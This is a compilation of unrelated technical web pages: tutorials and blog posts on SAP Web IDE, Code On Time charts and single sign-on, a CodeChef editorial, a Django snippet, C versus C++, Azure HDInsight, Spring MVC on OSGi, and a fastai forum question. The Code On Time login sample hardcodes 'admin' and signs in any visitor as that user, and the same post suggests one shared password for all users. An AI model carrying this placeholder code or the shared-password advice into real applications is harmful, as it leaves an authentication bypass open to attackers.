          <Text text="{Address/Street}"/>
          <Text text="{Address/City}"/>
          <Text text="{Address/PostalCode}"/>
          <Text text="{Address/CountryText}"/>
        </f:content>
      </f:SimpleForm>
    </l:content>
  </l:Grid>
</core:FragmentDefinition>
```

Your file should look like this:

Return to Detail.view.xml. You will make a few simple edits to the file before you do some bigger restructuring. At the top of the file, in the mvc:View element, insert an additional XML namespace attribute (this namespace will be used when the fragment is loaded):

```
xmlns:core="sap.ui.core"
```

The top of your file should look like this:

Scroll down to the IconTabFilter elements. Update both IconTabFilter sections as shown in the image below.
You will need to:

- change both icon attributes as shown in the image
- insert the two text attributes provided below. These link the labels for the tabs to lines you previously inserted into i18n.properties.

For the first IconTabFilter element:

```
text="{i18n>itf1Title}"
```

For the second IconTabFilter element:

```
text="{i18n>itf2Title}"
```

The next step is to set the content to be displayed in the first tab. Place your cursor at the end of line 35 (the tooltip line of the first IconTabFilter) and type in <content> (type it in rather than copying and pasting, this one time). You will notice that as soon as you type the closing angle bracket, the SAP Web IDE automatically inserts the </content> closing tag for you. Add some line feeds between the <content> tags so your file looks like this:

This step will start the restructuring of the detail view, where you will move the entire <Table> element from its current location and place it within the <content> element you just inserted. Locate the entire <Table> element as shown below and cut the text (using CTRL+X). Paste the text you just cut within the <content> element you added above and save your changes.

The field displayed below the contact's full name is the ContactKey, which is not useful to a user. Change that field to show the gender of the contact by replacing {ContactKey} with {GenderText}, save your change and run your app. The detail view will now look like this:

The last part of the restructuring is to add a <content> element for the second tab (the second <IconTabFilter> in the file) to load the fragment file you created. Insert the XML snippet shown below before the closing tag of the second <IconTabFilter>, as shown in the image below.

```xml
<content>
  <core:Fragment
</content>
```

The section of the Detail.view.xml file for your second <IconTabFilter> should look like this:

The last change before running your app is to modify the manifest.json file located in te2016 > webapp. Insert the two lines below as shown in the image.
If the file is opened in the Descriptor Editor mode, click the Code Editor tab at the bottom of the window to change the mode.

```
"ach": "ach",
"resources": "resources.json",
```

Save your edits and run your app. The two tabs in the detail view should look like the images below.

Contact tab:

Map tab:

Updated 12/12/2017
Contributors: thecodester, akula86, adadouche
https://www.sap.com/mena-ar/developer/tutorials/teched-2016-6.html
Code On Time applications now offer a new type of data rendering – the “Chart” view. A chart view is just another way of presenting a set of data records retrieved from the database. Chart views support many end-user features, including sorting and adaptive filtering.

Generate a new web application from the Northwind database. Browse the generated web site and select the Reports | Sales by Category menu option. The following data view will be displayed. Columns CategoryID, Category Name, Product Name, and Product Sales are visible in the grid view. The data controller is based on the database view dbo.[Sales by Category]. This view is a part of the Northwind database and is defined as follows.

```sql
create view [dbo].[Sales by Category] AS
SELECT Categories.CategoryID, Categories.CategoryName, Products.ProductName,
    Sum([Order Details Extended].ExtendedPrice) AS ProductSales
FROM Categories INNER JOIN
        (Products INNER JOIN
            (Orders INNER JOIN [Order Details Extended]
                ON Orders.OrderID = [Order Details Extended].OrderID)
            ON Products.ProductID = [Order Details Extended].ProductID)
        ON Categories.CategoryID = Products.CategoryID
WHERE Orders.OrderDate BETWEEN '19970101' And '19971231'
GROUP BY Categories.CategoryID, Categories.CategoryName, Products.ProductName
```

Start the code generator, select the project name, and click the Design button. Select the data controller SalesbyCategory and click on the Views tab. Add a new view, set its Id to chart1, select Chart as the view type, and select command1 as the command. Set the label to Sales Chart. Enter “Total sales by product category.” in the header text. Save the view, click on its name in the list of available data controller views, and select the Data Fields tab.

Add a new data field with the field name set to CategoryName. Set its Chart property under the Miscellaneous section to X. Save the field. Add another data field with the field name set to ProductSales. Enter the letter “c” without double quotes into Data Format String. Set the Aggregate Function property of the data field to Sum. Set its Chart property to Bar (Cylinder). The list of data views in Designer will look as follows.

Exit the Designer and generate your application. Activate the same page and select the Sales Chart option in the view selector in the right-hand corner of the action bar. The following chart will be displayed.
Activate the filter in the view selector and select “Filter…” item in the popup menu of the Category Name option. Select several filter options to review subset of data presented in the chart. The chart view is capable of displaying multiple data series. Let’s add a calculated field to the same data controller to simulate the “Previous Product Sales”. Select the data controller in Designer and activate Fields tab. Add a new field with name PreviousProductSales, indicate that the field value is calculated by SQL formula and enter the following SQL formula cast(ProductSales * Rand() as Numeric(10,2)) into SQL Formula text box. Set the label of the field to “Previous Product Sales”. Set its Data Format String to “c” without quotes. Save the field and select Views tab. Select chart1 in the list of available views. Bind the new field to the chart1 view and set its properties to make them look as shown in the screenshot. Notice that we are using a different Chart type Column(Cylinder) for ProductSales. Run the generated application. The following chart view will be presented if you activate Sales Chart in the view selector. The actual spline that you will see may look different due to randomization factor of the formula that we have specified to simulate the previous sales. You can activate a legend if you select the chart view in Designer and mark the check box “Enable legend in the chart area”. The data field header will be used as the text displayed in the chart legend. Chart views are based on the standard Microsoft Data Visualization component included with ASP.NET 4.0. Unlimited customization options are available to developers. You can quickly customize a chart view if you select “Custom” as Chart property of the data field. All charts are generated as ASP.NET user controls stored in ~/Controls folder of your web application. For example, the name of the chart in this sample is ~/Controls/Chart_SalesbyCategory_chart1.ascx. 
The name of a chart user control always starts with Chart and includes the name of the data controller and the chart view ID. “Custom” charts are generated once only. If a “Custom” chart exists, the code generator will not make an attempt to generate the chart again. You can safely modify hundreds of the chart control properties.

The upcoming updates of the code generation library will include support for Filter Groups on the view level, to allow transitioning of grid view data filters applied to a selected chart view and vice versa. Additional chart types will also be supported. We are also working on bringing interactive features of the chart, such as tooltips and hyperlinks, into the code generation library.

Code On Time web application generator supports ASP.NET Membership and several other authentication mechanisms. ASP.NET Membership is an attractive option for Internet applications and can also be successfully used in intranet applications deployed within the network boundaries of an organization for use by a specific group of business users. The web application administrator can use the advanced user manager provided with each generated application to create user accounts and manage roles.

Large organizations frequently mandate a single sign-on mechanism to eliminate the need to manage multiple passwords and user accounts. You can take advantage of either option to implement mixed authentication based on the ASP.NET Membership option available in Code On Time database web applications. Only the users registered in the ASP.NET Membership database of your application can access the application. User roles will also be derived from the membership database. Users can self-register to use the application and will be able to access the application page when the user account is approved by the administrator. The administrator can also create all authorized user accounts and assign the same “secret” password to all users.
Single sign-on is enabled through changes to the login user control. Open the file ~/App_Code/Controls/Login.ascx and modify the code-behind file as shown below.

C#:

```csharp
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Web.Security;
using System.Security.Principal;

public partial class Controls_Login : System.Web.UI.UserControl
{
    protected void Page_Load(object sender, EventArgs e)
    {
        // Mixed authentication sample
        if (!Page.User.Identity.IsAuthenticated)
        {
            string userName = null;
            // 1. read the identity from the page request header variable
            userName = Request.Headers["UserName"];
            // 2. read the identity from the identity of the current Windows user
            userName = WindowsIdentity.GetCurrent().Name;
            // simulate the user name and ignore methods (1) and (2)
            userName = "admin";
            if (!String.IsNullOrEmpty(userName))
            {
                MembershipUser user = Membership.GetUser(userName);
                if (user != null)
                    FormsAuthentication.RedirectFromLoginPage(user.UserName, false);
            }
        }
    }
}
```

Methods of “silent” authentication are marked as (1) and (2). This particular example ignores the obtained information and simply assigns the user name “admin” to the variable userName. The application makes a lookup request to identify the user as a valid ASP.NET Membership user. If that is the case, the user is automatically signed into the web application.

The login control is generated the first time only; your changes to the code-behind file will stay intact through subsequent code generations. Adjust the sample to reflect your actual single sign-on method.

Code On Time announces support for a new type of view called “Chart”. The feature is based on the excellent charting capabilities built into the chart component available in Microsoft Data Visualization tools. Chart views are similar to grid views. An additional configuration step requires selection of a chart type.
A developer will also have to indicate which data fields will be rendered as X and Y values. Web application generator automatically configures appropriate presentation for the selected chart type. A dedicated chart control is created for each chart view defined in an application. This will allow precise customization of the chart presentation. The new feature allows advanced data visualization with adaptive filtering and sorting. Adaptive filters are available from the first option on the action bar. The next screen shot shows the view with multiple value filters applied to the data. An alternative access to the chart filters is available though the view selector as presented in the next screen shot. Chart views automatically fit into the real estate available in the data view container. Learn more about data view containers at /Documents/UGP2%20-%20User%20Controls.pdf. The chart view support will be shipped in the release scheduled to go out this week. The initial release will support charting in ASP.NET 4.0 projects only with a limited set of chart types. We expect to support dozens of chart types that will require no programming. Developers will be able to customize charts manually to take the full advantage of data visualization components. The feature will be included in Premium and Unlimited subscriptions. The new feature does not require any external components.
https://codeontime.com/blog?min-date=2011-01-01T00:00:00&max-date=2011-01-31T23:59:59
LOST CHILDREN

PROBLEM LINK

Author: Aman Nadaf
Tester: Aman Nadaf
Editorialist: Aman Nadaf

DIFFICULTY:

Cakewalk

PREREQUISITES:

Linear Search

PROBLEM:

During a fair, parents lost their child in the crowd. You are appointed as a security guard with the duty to find that particular child. You gather a group of N lost children in a queue and try to find the child with id K given by his/her parents. If the child is found, inform the parents of the position of the child in the queue; otherwise report "not found". Help T such parents find their children.

EXPLANATION:

Take an array of size N (given) and look for the position of the id K (given). You can loop i from 0 to N-1 and check whether K == array[i]; if found, print the (1-based) position, otherwise print "not found".

SOLUTIONS:

Setter's Solution

```cpp
#include <bits/stdc++.h>
using namespace std;
#define ll long long
#define ff first
#define ss second
#define pb push_back
#define vi vector<int>
#define vll vector<long long int>

int main()
{
    int t;
    cin >> t;
    while (t--) {
        ll n, k, pos = 0;
        cin >> n >> k;
        ll a[n];
        for (ll i = 0; i < n; i++)
            cin >> a[i];
        for (ll i = 0; i < n; i++) {
            if (a[i] == k) {
                pos = i + 1;
                break;
            }
        }
        if (pos == 0)
            cout << "not found" << endl;
        else
            cout << pos << endl;
    }
}
```

Feel free to share your approach here. Suggestions are always welcome.
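The same linear scan reads naturally in Python as well; this is an illustrative sketch of the editorial's approach, not part of the setter's code:

```python
def find_child(ids, k):
    """Return the 1-based position of id k in the queue, or None if absent."""
    for pos, child_id in enumerate(ids, start=1):
        if child_id == k:
            return pos
    return None

queue = [4, 1, 7, 9]
print(find_child(queue, 7))                 # 3
print(find_child(queue, 5) or "not found")  # not found
```

Like the setter's C++ loop, this is O(N) per query: each id is compared once until a match is found or the queue is exhausted.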
https://discuss.codechef.com/t/lc001-editorial/95861
- Author: nmb10
- Posted: October 31, 2010
- Language: Python
- Version: 1.2
- Tags: django, json, piston, compare
- Score: -1 (after 1 rating)

Shows the difference between two JSON-like Python objects. May help when testing JSON responses, Piston-powered API sites, and the like. Shows properties and values from the first object that are not in the second.

Example:

```python
import simplejson  # or another JSON serializer

first = simplejson.loads('{"first_name": "Poligraph", "last_name": "Sharikov"}')
second = simplejson.loads('{"first_name": "Poligraphovich", "pet_name": "Sharik"}')

df = Diff(first, second)
# df.difference is ["path: last_name"]
```

Diff(first, second, vice_versa=True) gives you the difference from both objects in one result:

```python
df = Diff(first, second, vice_versa=True)
# df.difference is ["path: last_name", "path: pet_name"]
```

Diff(first, second, with_values=True) gives you the difference of the value strings.

Comments:

For dicts, you might try to use set(dict1.iteritems()) - set(dict2.iteritems()), which will compute the difference for you: fast and efficient. For lists, you might use set(enumerate(list1)) - set(enumerate(list2)). Now generalize the mapper and use set(mapper(json1)) - set(mapper(json2)). No need for 66 lines, which are completely unrelated to Django.

I think it's good, but not for all cases:

    fir = {"f": "foo"}
    sec = {"f": "bar"}

Your method gives us [('f', 'foo')] as the difference, but both have the same keys.

    fir = {"f": "foo"}
    sec = {"f": [1]}

Your method does not give a proper difference here.

    fir = {"f": {"f": "fir"}}
    sec = {"f": {"b": "bar"}}
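The set-difference approach suggested in the comments, and the cases the reply objects to, can be checked directly (Python 3 spelling, dict.items() instead of iteritems()):

```python
first = {"first_name": "Poligraph", "last_name": "Sharikov"}
second = {"first_name": "Poligraphovich", "pet_name": "Sharik"}

# Pairs present in `first` but absent from `second`: this catches keys that
# are missing as well as keys whose values differ.
print(sorted(set(first.items()) - set(second.items())))
# [('first_name', 'Poligraph'), ('last_name', 'Sharikov')]

# Keys only, ignoring values:
print(sorted(set(first) - set(second)))  # ['last_name']

# The reply's objection in the list/dict examples: items() pairs must be
# hashable, so nested JSON values such as lists or dicts make set() fail.
try:
    set({"f": [1]}.items()) - set({"f": [2]}.items())
except TypeError:
    print("unhashable value")  # unhashable value
```

So the one-liner works for flat string-valued objects but not for nested JSON, which is the case the snippet's recursive path-based Diff is written for.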
https://djangosnippets.org/snippets/2247/
Writing C in the 21st century

The Internet Systems Consortium, or ISC for short, is well known for developing and publishing Internet system software such as BIND and DHCP. Today, they commented on why they rewrote BIND 10 in C++ and Python. I think this needs some discussion. They write:

> So when ISC started seriously thinking about BIND 10 – around 2006 or so – the question of what language to use for the new project came up. The first question is of course, “Why not C?” Some answers are:

String manipulation in C is a tedious chore

String manipulation in C can be a tedious chore when you write something like this (taken from lib/isccc/cc.c)

```c
len = strlen(_frm) + strlen(_to) + strlen(_ser) + strlen(_tim) + 4;
key = malloc(len);
if (key == NULL)
        return (ISC_R_NOMEMORY);
snprintf(key, len, "%s;%s;%s;%s", _frm, _to, _ser, _tim);
```

all the time and don't follow the DRY rule. Not only is

```c
key = g_strdup_printf ("%s;%s;%s;%s", _frm, _to, _ser, _tim);
```

shorter and easier to grasp, it is also a lot less dangerous than calculating the final string length by hand. Even if ISC decides not to use a portable C library such as GLib or Apache APR, they could still write something like that on their own instead of relying on C's standard library.

Error handling is optional and cumbersome

Yes, error handling is optional and sometimes it is cumbersome, but exception handling as used in C++ or Java is no silver bullet either. Whereas C¹ and Go explicitly tell the developer “look, this might be a potentially dangerous call”, a C++ program might explode in places where you don't expect that to happen.

Encapsulation and other object-oriented features must be emulated

Encapsulation does not need to be “emulated”; it is a matter of sound interface design. Thousands of robust and cleanly written libraries have shown how this works for decades now: provide an opaque data structure and let the user access it via public API functions. I wonder what the other ominous, object-oriented features are.
C lacks good memory management

What constitutes “good” memory management? Fast, predictable and extensible? Or safe and simple with a garbage collector? Both are possible with C. On the other hand, C++ is a lot better at resource management if RAII is used. But then, it must be applied consistently.

I am not saying that C++ is a bad choice, nor that C does wonders for BIND. But naive and untrue statements about C, and strange reasons in favor of C++ like this:

> C++ is also a very popular language, and also has all of the features we are looking for. However, C++ is by no means an easy language to work with, so the idea is that we will avoid its complexity when possible.

deserve some clarification. C is not dead, and even today new projects can be written in it in a sound and safe way. But people must be willing to dedicate a little bit of their precious time.

A lively discussion about ISC's blog post is going on in this HN comment thread.

¹ Yes, I know you can ignore return values. But at least you know that a function that returns an error code can fail. A C++ exception is handed up the stack to whoever catches it first.
https://bloerg.net/posts/writing-c-in-the-21st-century/
Microsoft and Hadoop - Windows Azure HDInsight

Introduction

Traditionally, Microsoft Windows used to be a sort of stepchild in the Hadoop world – the hadoop command used to manage actions from the command line and the startup/shutdown scripts were written with Linux/*nix in mind, assuming bash. Thus if you wanted to run Hadoop on Windows, you had to install Cygwin. Also, the Apache Hadoop documentation states the following (quotes from Hadoop R1.1.0 documentation):

“• GNU/Linux is supported as a development and production platform. Hadoop has been demonstrated on GNU/Linux clusters with 2000 nodes
• Win32 is supported as a development platform. Distributed operation has not been well tested on Win32, so it is not supported as a production platform.”

Microsoft and Hortonworks joined forces to make Hadoop available on Windows Server for on-premise deployments as well as on Windows Azure to support big data in the cloud, too. This post covers Windows Azure HDInsight (Hadoop on Azure, see). As of writing, the service requires an invitation to participate in the CTP (Community Technology Preview), but the invitation process is very efficiently managed: after filling in the survey, I received the service access code within a couple of days.

New Cluster Request

The first step is to request a new cluster: you need to define the cluster name and the credentials to be able to log in to the headnode. By default the cluster consists of 3 nodes. After a few minutes you will have a running cluster; then click on the “Go to Cluster” link to navigate to the main page.

WordCount with HDInsight on Azure

No Hadoop test is complete without the standard WordCount application – Microsoft Azure HDInsight provides an example file (davinci.txt) and the Java jar file to run wordcount, the Hello World of Hadoop.
First you need to go to the JavaScript console to upload the text file using fs.put():

```
js> fs.put()
Choose File -> Browse
Destination: /user/istvan/example/data/davinci
```

Create a Job:

The actual command that Microsoft Azure HDInsight executes is as follows:

```
c:\apps\dist\hadoop-1.1.0-SNAPSHOT\bin\hadoop.cmd jar c:\apps\Jobs\templates\634898986181212311.hadoop-examples-1.1.0-SNAPSHOT.jar wordcount /user/istvan/example/data/davinci davinci-output
```

You can validate the output from the JavaScript console:

```
js> result = fs.read("davinci-output")
"(Lo)cra" 1
"1490 1
"1498," 1
"35" 1
"40," 1
"AS-IS". 1
"A_ 1
"Absoluti 1
"Alack! 1
```

Microsoft HDInsight Streaming – Hadoop job in C#

Hadoop Streaming is a utility to support running external map and reduce jobs. These external jobs can be written in various programming languages such as Python or Ruby – but should we talk about Microsoft HDInsight, the example had better be based on .NET C#…

The demo application for C# streaming is again a wordcount example, using imitations of the Unix cat and wc commands. You could run the demo from the “Samples” tile, but I prefer to demonstrate Hadoop Streaming from the command line to have a closer look at what is going on under the hood. In order to run the Hadoop command line from a Windows cmd prompt, you need to log in to the HDInsight headnode using Remote Desktop. First you need to click on the “Remote Desktop” tile, then log in to the remote node using the credentials you defined at cluster creation time. Once you are logged in, click on the Hadoop Command Line shortcut.

In the Hadoop Command Line, go to the Hadoop distribution directory (as of writing this post, Microsoft Azure HDInsight is based on Hadoop 1.1.0):

```
c:> cd \apps\dist
c:> hadoop fs -get /example/apps/wc.exe .
c:> hadoop fs -get /example/apps/cat.exe .
```
```
c:> cd \apps\dist\hadoop-1.1.0-SNAPSHOT
c:\apps\dist\hadoop-1.1.0-SNAPSHOT> hadoop jar lib\hadoop-streaming.jar -input "/user/istvan/example/data/davinci" -output "/user/istvan/example/dataoutput" -mapper "..\..\jars\cat.exe" -reducer "..\..\jars\wc.exe" -file "c:\Apps\dist\wc.exe" -file "c:\Apps\dist\cat.exe"
```

The C# code for wc.exe is as follows:

```csharp
using System;
using System.IO;
using System.Linq;

namespace wc
{
    class wc
    {
        static void Main(string[] args)
        {
            string line;
            var count = 0;
            if (args.Length > 0)
            {
                Console.SetIn(new StreamReader(args[0]));
            }
            while ((line = Console.ReadLine()) != null)
            {
                count += line.Count(cr => (cr == ' ' || cr == '\n'));
            }
            Console.WriteLine(count);
        }
    }
}
```

And the code for cat.exe is:

```csharp
using System;
using System.IO;

namespace cat
{
    class cat
    {
        static void Main(string[] args)
        {
            if (args.Length > 0)
            {
                Console.SetIn(new StreamReader(args[0]));
            }
            string line;
            while ((line = Console.ReadLine()) != null)
            {
                Console.WriteLine(line);
            }
        }
    }
}
```

Interactive console

Microsoft Azure HDInsight comes with two types of interactive console: one is the standard Hadoop Hive console, the other one is unique in the Hadoop world, as it is based on JavaScript.

Let us start with Hive. You need to upload your data using the JavaScript fs.put() method as described above. Then you can create your Hive table and run a select query as follows:

```sql
CREATE TABLE stockprice (yyyymmdd STRING, open_price FLOAT, high_price FLOAT,
    low_price FLOAT, close_price FLOAT, stock_volume INT, adjclose_price FLOAT)
    row format delimited fields terminated by ','
    lines terminated by '\n'
    location '/user/istvan/input/';

select yyyymmdd, high_price, stock_volume from stockprice order by high_price desc;
```

The other flavor of the HDInsight interactive console is based on JavaScript. As said before, this is a unique offering from Microsoft; in fact, the JavaScript commands are converted to Pig statements. The syntax resembles a kind of LINQ-style query, though it is not the same:

```
js> pig.from("/user/istvan/input/goog_stock.csv", "date,open,high,low,close,volume,adjclose", ",").select("date, high, volume").orderBy("high DESC").to("result")
js> result = fs.read("result")
05/10/2012 774.38 2735900
04/10/2012 769.89 2454200
02/10/2012 765.99 2790200
01/10/2012 765 3168000
25/09/2012 764.89 6058500
```
https://dzone.com/articles/microsoft-and-hadoop-windows
Running Spring MVC Web Applications in OSGi

For the past couple of weeks, I've been developing a web application that deploys into an OSGi container (Equinox) and uses Spring DM's Spring MVC support. The first thing I discovered was that Spring MVC's annotations weren't supported in the M1 release. This was apparently caused by a bug in Spring 2.5.3 and not Spring DM. Since Spring DM 1.1.0 M2 was released with Spring 2.5.4 today, I believe this is fixed now.

The story below is about my experience getting a Spring MVC application up and running in Equinox 3.2.2, Jetty 6.1.9 and Spring DM 1.1.0 M2 SNAPSHOT (from last week). If you want to read more about why Spring MVC + OSGi is cool, see Costin Leau's Web Applications and OSGi article.

To get a simple "Hello World" Spring MVC application working in OSGi is pretty easy. The hard part is setting up a container with all the Spring and Jetty bundles installed and started. I imagine SSAP might solve this. Luckily for me, this was done by another member of my team. After you've done this, it's simply a matter of creating a MANIFEST.MF for your WAR that contains the proper information for OSGi to recognize. Below is the one that I used when I first tried to get my application working.

Manifest-Version: 1
Bundle-ManifestVersion: 2
Spring-DM-Version: 1.1.0-m2-SNAPSHOT
Spring-Version: 2.5.2
Bundle-Name: Simple OSGi War
Bundle-SymbolicName: myapp
Bundle-Classpath: .,WEB-INF/classes,WEB-INF/lib/freemarker-2.3.12.jar,
 WEB-INF/lib/sitemesh-2.3.jar,WEB-INF/lib/urlrewritefilter-3.0.4.jar,
 WEB-INF/lib/spring-beans-2.5.2.jar,WEB-INF/lib/spring-context-2.5.2.jar,
 WEB-INF/lib/spring-context-support-2.5.2.jar,WEB-INF/lib/spring-core-2.5.2.jar,
 WEB-INF/lib/spring-web-2.5.2.jar,WEB-INF/lib/spring-webmvc-2.5.2

Ideally, you could generate this MANIFEST.MF using the maven-bundle-plugin. However, it doesn't support WARs in its 1.4.0 release.
You can see this is an application that uses Spring MVC, FreeMarker, SiteMesh and the URLRewriteFilter. You should be able to download it, unzip it, run "mvn package" and install it into Equinox using "install file://<path to war>". That's all fine and dandy, but it doesn't give you any benefits of OSGi.

This setup works great until you try to import OSGi services using a context file with an <osgi:reference> element. After adding such a reference, it's likely you'll get the following error:

SEVERE: Context initialization failed
org.springframework.beans.factory.parsing.BeanDefinitionParsingException: Configuration problem: Unable to locate Spring NamespaceHandler for XML schema namespace []

To fix this, add the following to your web.xml (if you're using ContextLoaderListener; use an <init-param> on DispatcherServlet if you're not):

<context-param>
    <param-name>contextClass</param-name>
    <param-value>org.springframework.osgi.web.context.support.OsgiBundleXmlWebApplicationContext</param-value>
</context-param>

After doing this, you might get the following error on startup:

SEVERE: Context initialization failed
org.springframework.context.ApplicationContextException: Custom context class [org.springframework.osgi.web.context.support.OsgiBundleXmlWebApplicationContext] is not of type [org.springframework.web.context.ConfigurableWebApplicationContext]

To fix this, I changed from referencing the Spring JARs in WEB-INF/lib to importing the packages for Spring (which were already installed in my Equinox container).
Bundle-Classpath: .,WEB-INF/classes,WEB-INF/lib/freemarker-2.3.12.jar,

After rebuilding my WAR and reloading the bundle in Equinox, I was confronted with the following error message:

SEVERE: Context initialization failed
org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'freemarkerConfig' defined in ServletContext resource [/WEB-INF/myapp-servlet.xml]: Instantiation of bean failed; nested exception is java.lang.NoClassDefFoundError: freemarker/cache/TemplateLoader
    at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.instantiateBean(AbstractAutowireCapableBeanFactory.java:851)

As far as I can tell, this is because the version of Spring MVC installed in Equinox cannot resolve the FreeMarker JAR in my WEB-INF/lib directory. To prove I wasn't going insane, I commented out my "freemarkerConfig" and "viewResolver" beans in myapp-servlet.xml and changed to a regular ol' InternalResourceViewResolver:

<bean id="viewResolver" class="org.springframework.web.servlet.view.InternalResourceViewResolver">
    <property name="prefix" value="/"/>
    <property name="suffix" value=".jsp"/>
</bean>

This worked and I was able to successfully see "Hello World" from a JSP in my browser. FreeMarker/SiteMesh worked too, but FreeMarker didn't work as a View for Spring MVC. To attempt to solve this, I created a bundle for FreeMarker using "java -jar bnd-0.0.249.jar wrap freemarker-2.3.12.jar" and installed it in Equinox. I then changed my MANIFEST.MF to use FreeMarker imports instead of referencing the JAR in WEB-INF/lib.

Bundle-Classpath: .,WEB-INF/classes

Unfortunately, this still doesn't work and I still haven't been able to get FreeMarker to work with Spring MVC in OSGi. The crazy thing is I actually solved this at one point a week ago. Shortly after, I rebuilt Equinox from scratch, and I've been banging my head against the wall over this issue ever since.
Last week, I entered an issue in Spring's JIRA, but thought I'd fixed it a few hours later. I've uploaded the final project that's not working to the following URL:

If you'd like to see this project work with Spring MVC + JSP, simply modify myapp-servlet.xml to remove the FreeMarker references and use the InternalResourceViewResolver instead. I hope Spring DM + Spring MVC supports more than just JSP as a view technology, and I hope the reason I can't get FreeMarker working is some oversight on my part. If you have a Spring DM + Spring MVC application working with Velocity or FreeMarker, I'd love to hear about it.

Great to see you working on OSGi stuff. With regard to your Freemarker problem, sadly bringing a third-party library into OSGi is rarely as simple as just running "bnd wrap" over it. The issue is the dependencies... bnd does bytecode analysis to discover all of the static dependencies inside Freemarker and it adds those to the manifest. So if it discovers a dependency on (say) org.apache.commons.lang, then the FM bundle won't resolve unless you have commons-lang bundleized and installed as well.

The real problem is that many libraries include dependencies on crazy stuff. For example, lots have a dependency on JUnit because they have not properly separated their tests from their runtime parts. However, bnd has no way to automatically discriminate between "true" runtime dependencies and the ones that are just sitting around in the JAR. So you have to help it along. The initial step is to run bnd and then look at the imports it has included; then you determine which of those imports are not really needed, and you write a properties file to tell bnd that those imports should be made optional.

I am in the process of documenting these issues in my book, but I haven't yet released the chapter on working with 3rd party libraries.
But you may still find something useful in the chapters that I have released: Regards, Neil PS I tried to download Freemarker myself and check if this was in fact the problem, but unfortunately SourceForge seems to be down at present. Posted by Neil Bartlett on April 30, 2008 at 05:49 AM MDT # Posted by Carlos Sanchez on April 30, 2008 at 10:03 AM MDT # This was a great challenge application for the SpringSource Application Platform - especially in the light of the comments from Neil Bartlett and Carlos Sanchez above. I'm pleased to say that getting this application to work on the SpringSource Application Platform was trivial, and a testament to the points I made in my blog last night Completing the picture, Spring, OSGi, and the SpringSource Application Platform.Here are the steps I followed: I think this is a nice demonstration of the value proposition of the platform in smoothing the path of making enterprise libraries work under OSGi. I'm happy to send you the updated code if you would like it, but it should be very easy to recreate these simplifications to your application :)Regards, Adrian. Posted by Adrian Colyer on May 02, 2008 at 08:22 AM MDT # Posted by Matt Raible on May 02, 2008 at 11:04 AM MDT # If you want to use <osgi:reference> then you will need that context class, yes. We distinguish between "shared library" war files that simply use Import Package / Bundle / Library in their manifest, and "shared service" war files that also can inject references to OSGi services. These two stages form a migration path towards a true par file. Your initial application didn't use any "shared services" so the special context wasn't needed. Good luck with the application - do keep us posted on any issues you run into so that we can continue to make things work better for you. Thanks, Adrian. 
Posted by Adrian Colyer on May 03, 2008 at 12:33 AM MDT # Please bear in mind that using the Import-Library and Import-Bundle headers as recommended by Adrian will tie you to S2AP, as these are non-standard extensions introduced by SpringSource. My recommendation is to stick with the full Import-Package list. Yes it is long, but at least the dependencies of your bundle are defined <strong>in your bundle</strong> rather than in some external artifact which might change. I have detailed some of my issues with SpringSource's extensions in my blog post here: Cheers Neil Posted by Neil Bartlett on May 08, 2008 at 04:09 AM MDT # Posted by Rob Harrop on May 08, 2008 at 11:49 AM MDT # Posted by Matt Raible on May 14, 2008 at 10:38 AM MDT # The tool that Adrian and Rob mentioned does not yet exist; however, I'll share a perhaps little know tip with you... If you create a bundle using Import-Bundle or Import-Library, you can view the Platform's trace (i.e., PLATFORM_HOME/serviceability/trace/trace.log) and see exactly how those manifest headers get translated into standard OSGi Import-Package statements. Just search for "transformed from:", and just after that you'll find a "to:" with the transformed manifest immediately following. Now to answer the question you posted on the S2AP beta forum regarding how to get your sample web application to run on the Platform without any SpringSource specific manifest headers: As Adrian already mentioned, it's rather trivial to convert your web-app to run using Import-Bundle and Import-Library. So, to get it to run on the SpringSource Application Platform using only Import-Package, simply follow Adrian's above steps, but use the following manifest instead: Delete the following, as they are not necessary for deploying WARs or Web Modules on the S2AP: And in web.xml, use PlatformOsgiBundleXmlWebApplicationContext instead of OsgiBundleXmlWebApplicationContext as the 'contextClass' context-param for Spring MVC's ContextLoaderListener. 
For example: I hope this gets you up and running with your Freemarker web-app on the S2AP! Best regards, Sam SpringSource Posted by Sam Brannen on May 16, 2008 at 10:03 PM MDT # Hi, I am trying to test and install: but when I do: I get: and when I go to I get: Any ideas? Thank you Yours Misha Posted by Misha Koshelev on October 10, 2010 at 09:36 PM MDT # Posted by JIRA: OpenMRS Trunk on October 11, 2010 at 04:30 PM MDT # Update: I have installed successfully on Virgo Web Server: I enable the Equinox telnet console by uncommenting the following line: then drop the following bundle into pickup: I go to the console, install bundle, it is active: Yet get a 404 from the suggested URL: Any ideas? Thank you! Misha Posted by Misha Koshelev on October 12, 2010 at 07:18 PM MDT # Posted by Matt Raible on October 12, 2010 at 10:07 PM MDT # I download your zip and packaged and installed the war. But I am getting this error. Where I am wrong, Thanks. Posted by Muthu on August 31, 2013 at 12:33 PM MDT #
http://raibledesigns.com/rd/entry/running_spring_mvc_web_applications
I've an assignment in college to train a language model and use it for regression, and I've had problems transferring the trained model to regression. After a day of going through the text/learner.py code, I understood that we are supposed to batch the whole input sentence in a single batch and pass it to the new tail network we join for regression. I don't want to use PoolingLinearClassifier for now since I don't understand it much.

In Lesson 12 Jeremy talks about this, and I found the SentenceEncoder code, which is very similar to the MultiBatchEncoder in the source repository. This version kind of worked in my code because of the different way in which it concatenates at the end of the forward method. I also don't understand how the concat method of SentenceEncoder works, or how the pad_tensor method works.

Another thing: since we concat all texts together along with appending xxbos and xxeos, wouldn't the size of the input always be bptt? I don't understand how it would return sl, which I'm assuming is sentence length. Is batching for classification done differently?

def pad_tensor(t, bs, val=0.):
    if t.size(0) < bs:
        return torch.cat([t, val + t.new_zeros(bs-t.size(0), *t.shape[1:])])
    return t

class SentenceEncoder(nn.Module):
    def __init__(self, module, bptt, pad_idx=1):
        super().__init__()
        self.bptt,self.module,self.pad_idx = bptt,module,pad_idx

    def concat(self, arrs, bs):
        return [torch.cat([pad_tensor(l[si],bs) for l in arrs], dim=0) for si in range(len(arrs[0]))]

    def forward(self, input):
        bs,sl = input.size()
        self.module.bs = bs
        self.module.reset()
        outputs = []
        for i in range(0, sl, self.bptt):
            o = self.module(input[:,i: min(i+self.bptt, sl)])
            outputs.append(o)
        ops = self.concat(outputs, bs)
        return torch.stack(ops)

Now what I don't understand is that there is no mention of a max_len for the input, so how do we fix the size of the next Linear layer?
My code for the regression model is:

import torch
import torch.nn as nn
